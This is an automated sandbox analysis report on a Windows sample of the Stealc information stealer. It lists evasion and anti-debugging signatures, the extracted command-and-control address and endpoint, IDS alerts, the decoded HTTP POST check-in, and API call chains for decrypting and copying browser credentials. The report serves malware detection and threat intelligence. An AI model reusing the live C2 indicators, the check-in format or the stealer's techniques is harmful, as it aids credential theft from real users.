Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561643
MD5:3feea8ff886f1fc0d57da4a2b3a109ba
SHA1:78d6302f4f09726b6a129c5fcc7cd94a474cc53a
SHA256:143e6525646d5d95639eb77420a54205cb02fb8624c6e1662b7460f58b03523f
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3FEEA8FF886F1FC0D57DA4A2B3A109BA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1701395564.0000000005180000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7148JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7148JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T03:04:07.818374+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phpy;Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/iAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/GAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/5zm$Avira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.7148.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for domain / URL
              Source: http://185.215.113.206/c4becf79229cb002.php/GVirustotal: Detection: 18%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00444C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00444C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004460D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_004460D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004640B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_004640B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00456960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00456960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0044EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00456B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00456B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00449B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00449B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00449B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00449B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00447750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00447750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004518A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00453910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00453910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00451250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00451250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00451269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00451269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0045E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00454B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00454B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00454B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00454B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0045CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0044DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00452390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00452390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0044DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004523A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0045DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0045D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004416A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004416B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 41 37 32 43 37 45 41 45 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 2d 2d 0d 0a Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="hwid"E1A72C7EAE193468552849------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="build"mars------CBAKJKJJJECFIEBFHIEG--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00446C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_00446C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 41 37 32 43 37 45 41 45 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 2d 2d 0d 0a Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="hwid"E1A72C7EAE193468552849------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="build"mars------CBAKJKJJJECFIEBFHIEG--
              Source: file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/5zm$
              Source: file.exe, 00000000.00000002.1745302032.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/G
              Source: file.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/i
              Source: file.exe, 00000000.00000002.1745302032.00000000015B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy;
              Source: file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206k
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00449770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00449770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FF0760_2_007FF076
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C40_2_007FC8C4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004648B00_2_004648B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008311CE0_2_008311CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0080D2950_2_0080D295
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00779A310_2_00779A31
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00804ACF0_2_00804ACF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FB2F40_2_007FB2F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CA2E80_2_007CA2E8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FF30F0_2_007FF30F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FFC670_2_007FFC67
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007754CB0_2_007754CB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EF4B60_2_007EF4B6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F64960_2_007F6496
